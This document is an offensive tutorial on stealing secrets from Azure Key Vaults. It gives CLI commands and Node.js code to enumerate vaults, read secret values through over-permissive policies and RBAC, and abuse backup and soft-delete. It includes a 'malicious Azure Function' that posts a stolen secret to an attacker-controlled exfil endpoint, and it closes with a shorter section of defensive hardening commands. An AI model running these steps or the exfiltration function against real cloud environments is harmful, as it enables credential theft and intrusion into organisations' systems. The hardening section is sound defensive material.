Azure Key Vault Secrets Exfiltration

In this step, we'll use various techniques to enumerate Azure Key Vaults in the target environment. 1. Using Azure CLI to list Key Vaults: ```bash az keyvault list --query "[].{Name:name, ResourceGroup:resourceGroup}" -o table ``` 2. Enumerate Key Vault access policies: ```bash az keyvault show --name <key-vault-name> --query "properties.accessPolicies[].{ObjectId:objectId, Permissions:permissions}" ``` 3. List Key Vault secrets (if you have access): ```bash az keyvault secret list --vault-name <key-vault-name> --query "[].{Name:name, Enabled:attributes.enabled}" -o table ``` 4. Use Azure PowerShell to get Key Vault audit logs: ```powershell Get-AzDiagnosticSetting -ResourceId /subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.KeyVault/vaults/<key-vault-name> ``` Analyze the output to identify potential vulnerabilities and misconfigurations in the Key Vault setup.

Now that we've identified potential vulnerabilities, let's exploit common misconfigurations in Azure Key Vaults. 1. Exploiting overly permissive access policies: - Identify a service principal or user with excessive permissions - Use the Azure SDK to access secrets: ```javascript const { DefaultAzureCredential } = require("@azure/identity"); const { SecretClient } = require("@azure/keyvault-secrets"); const credential = new DefaultAzureCredential(); const vaultUrl = "https://<key-vault-name>.vault.azure.net"; const client = new SecretClient(vaultUrl, credential); async function listSecrets() { for await (const secretProperties of client.listPropertiesOfSecrets()) { console.log("Secret: ", secretProperties.name); const secret = await client.getSecret(secretProperties.name); console.log("Value: ", secret.value); } } listSecrets().catch((error) => { console.error("An error occurred:", error); }); ``` 2. Exploiting misconfigured network access controls: - Identify Key Vaults with public network access enabled - Attempt to access the Key Vault from an external network: ```bash az keyvault secret show --vault-name <key-vault-name> --name <secret-name> ``` 3. Leveraging RBAC misconfigurations: - Identify users or service principals with excessive RBAC roles - Use the Azure SDK to access Key Vault with RBAC permissions: ```javascript const { DefaultAzureCredential } = require("@azure/identity"); const { SecretClient } = require("@azure/keyvault-secrets"); const credential = new DefaultAzureCredential(); const vaultUrl = "https://<key-vault-name>.vault.azure.net"; const client = new SecretClient(vaultUrl, credential); async function getSecret(secretName) { const secret = await client.getSecret(secretName); console.log("Secret value:", secret.value); } getSecret("<secret-name>").catch((error) => { console.error("An error occurred:", error); }); ``` 4. Exploiting insecure secret rotation practices: - Identify secrets with long expiration times or no expiration - Monitor secret usage and attempt to use old versions of rotated secrets 5. Leveraging Azure AD misconfigurations: - Identify Azure AD apps with Key Vault access - Attempt to exploit misconfigured app registrations to gain Key Vault access Remember to document all findings and potential vulnerabilities discovered during the exploitation phase.

In this step, we'll explore advanced techniques to exfiltrate secrets from Azure Key Vaults. 1. Side-channel attacks on Key Vault: - Analyze network traffic patterns to identify potential information leakage - Implement timing attacks to infer secret information 2. Exploiting Key Vault backup and restore functionality: - Identify Key Vaults with backup enabled - Attempt to restore a Key Vault backup to a different Azure subscription or region ```bash az keyvault backup start --vault-name <source-key-vault> --backup-file <backup-file-name> az keyvault restore start --vault-name <destination-key-vault> --backup-file <backup-file-name> ``` 3. Leveraging Azure Function Apps for secret exfiltration: - Create a malicious Azure Function with Key Vault access - Use the function to exfiltrate secrets to an external endpoint ```javascript const { DefaultAzureCredential } = require("@azure/identity"); const { SecretClient } = require("@azure/keyvault-secrets"); const axios = require("axios"); module.exports = async function (context, req) { const credential = new DefaultAzureCredential(); const vaultUrl = "https://<key-vault-name>.vault.azure.net"; const client = new SecretClient(vaultUrl, credential); const secretName = "targetSecret"; const secret = await client.getSecret(secretName); // Exfiltrate the secret to an external endpoint await axios.post("https://attacker-controlled-endpoint.com/exfil", { secretName: secretName, secretValue: secret.value }); context.res = { status: 200, body: "Function executed successfully" }; } ``` 4. Exploiting managed identities: - Identify Azure resources with managed identities that have Key Vault access - Compromise the resource to leverage its managed identity for secret access 5. Abusing Azure Key Vault soft-delete feature: - Identify Key Vaults with soft-delete enabled but without purge protection - Attempt to recover deleted secrets using the soft-delete feature ```bash az keyvault secret recover --name <secret-name> --vault-name <key-vault-name> ``` Document all successful exfiltration attempts and the methods used to achieve them.

To secure Azure Key Vaults, implement the following best practices: 1. Enable Azure Defender for Key Vault: ```bash az security pricing create -n KeyVaults --tier 'Standard' ``` 2. Implement proper access controls: - Use Azure RBAC instead of Key Vault access policies - Assign least privilege roles to users and service principals ```bash az role assignment create --assignee <object-id> --role "Key Vault Secrets User" --scope /subscriptions/<subscription-id>/resourceGroups/<resource-group>/providers/Microsoft.KeyVault/vaults/<key-vault-name> ``` 3. Enable network security: ```bash az keyvault update --name <key-vault-name> --resource-group <resource-group> --default-action Deny --bypass AzureServices ``` 4. Enable soft-delete and purge protection: ```bash az keyvault update --name <key-vault-name> --resource-group <resource-group> --enable-soft-delete true --enable-purge-protection true ``` 5. Implement proper secret rotation: - Use Azure Key Vault's automatic rotation feature for supported services - Implement custom rotation logic for other secrets 6. Enable logging and monitoring: ```bash az monitor diagnostic-settings create --name KeyVaultLogs --resource <key-vault-id> --logs '[{"category": "AuditEvent","enabled": true}]' --metrics '[{"category": "AllMetrics","enabled": true}]' --workspace <log-analytics-workspace-id> ``` 7. Use managed identities for Azure resources: ```bash az webapp identity assign --name <app-name> --resource-group <resource-group> ``` 8. Implement proper secret management in applications: ```javascript const { DefaultAzureCredential } = require("@azure/identity"); const { SecretClient } = require("@azure/keyvault-secrets"); const credential = new DefaultAzureCredential(); const vaultUrl = "https://<key-vault-name>.vault.azure.net"; const client = new SecretClient(vaultUrl, credential); async function getSecret(secretName) { try { const secret = await client.getSecret(secretName); return secret.value; } catch (error) { console.error("Error retrieving secret:", error.message); throw error; } } ``` 9. Regularly review and audit Key Vault access: - Use Azure Policy to enforce compliance - Implement regular access reviews ```bash az policy assignment create --name 'audit-keyvault-logging' --display-name 'Audit logging for Azure Key Vault' --scope /subscriptions/<subscription-id> --policy '/providers/Microsoft.Authorization/policyDefinitions/cf820ca0-f99e-4f3e-84fb-66e913812d21' ``` By implementing these best practices, you can significantly improve the security of your Azure Key Vaults and reduce the risk of secret exfiltration. Remember to regularly perform security assessments and penetration testing on your Key Vaults to identify and address any new vulnerabilities or misconfigurations.